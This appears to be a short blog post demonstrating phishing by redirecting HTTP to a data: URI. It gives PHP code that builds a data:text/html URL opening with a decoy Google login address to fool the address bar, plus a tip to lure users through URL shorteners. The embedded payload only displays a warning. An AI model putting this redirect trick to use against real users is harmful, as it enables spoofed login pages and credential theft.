1/ Introduction
Little known fact: you can redirect HTTP to a data URI.
2/ Let's have fun with redirect
Create a php file: <?php
header("Location: data:text,Hello World");
?>
3/ Enhance with phishing
And yes, you can use HTML instead of pure text. And with HTML, you can do what you want. And the beginning of the data: URI will be printed in the adress bar. Looks good for having fun.- First, add HTML capabilities:
data:text/html - Second, trick user in address bar, because address bar will print the content of data: scheme:
https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1 - Third, add some HTML (and clean up)
<HTML><html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html> - Fourth, be nice by adding a pretty thing in Tab bar of Firefox: Google
4/ Ready to go:
Create a php file like this: <?php
$data_uri = "data:text/html,";
$decoy = "https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1";
$evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";
$pretty_tab_print = "Google";
$redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;
header("Location: " . $redirect_url);
?>
And trick a user to go to this page (you know, phishing stuff, with bit.ly or any url shortener):
A click on this php file served through a webserver will drive you to:
4/ Is it something new?
Well, yes and no.Phishing with data URI is known for a veeery long time. A paper has been published some time ago http://klevjers.com/papers/phishing.pdf
this is the same idea, I've added the vector with the 302 Redirect.
It's not a big deal, if you're tricked by this, you can be tricked by anything else.
Aucun commentaire:
Enregistrer un commentaire